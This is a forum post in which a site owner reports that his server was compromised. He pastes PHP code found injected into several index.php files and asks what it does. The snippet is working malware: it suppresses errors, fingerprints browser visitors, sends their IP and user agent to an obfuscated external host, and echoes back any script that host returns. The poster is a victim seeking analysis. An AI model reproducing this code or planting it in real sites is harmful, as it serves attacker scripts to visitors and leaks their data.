Scheduled Maintenance: We are aware of an issue with Google, AOL, and Yahoo services as email providers which are blocking new registrations. We are trying to fix the issue and we have several internal and external support tickets in process to resolve the issue. Please see: viewtopic.php?t=158230

 

 

 

Hacker

Programming languages, Coding, Executables, Package Creation, and Scripting.
Post Reply
Message
Author
User avatar
PatriceVigier
Posts: 9
Joined: 2011-12-15 21:43

Hacker

#1 Post by PatriceVigier »

Hello,

My server has been attacked and I found the following code in several index.php files.

Does anyone know what this code does?

Code: Select all

<?php
#a5733a#
error_reporting(0); ini_set('display_errors',0); $wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_srx6146) && !preg_match ('/bot/i', $wp_srx6146))){
$wp_srx096146="http://"."html"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_srx6146);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_srx096146);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6146srx = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_6146srx,1,3) === 'scr' ){ echo $wp_6146srx; }
#/a5733a#
?>

Thank you in advance :oops:
Patrice

Post Reply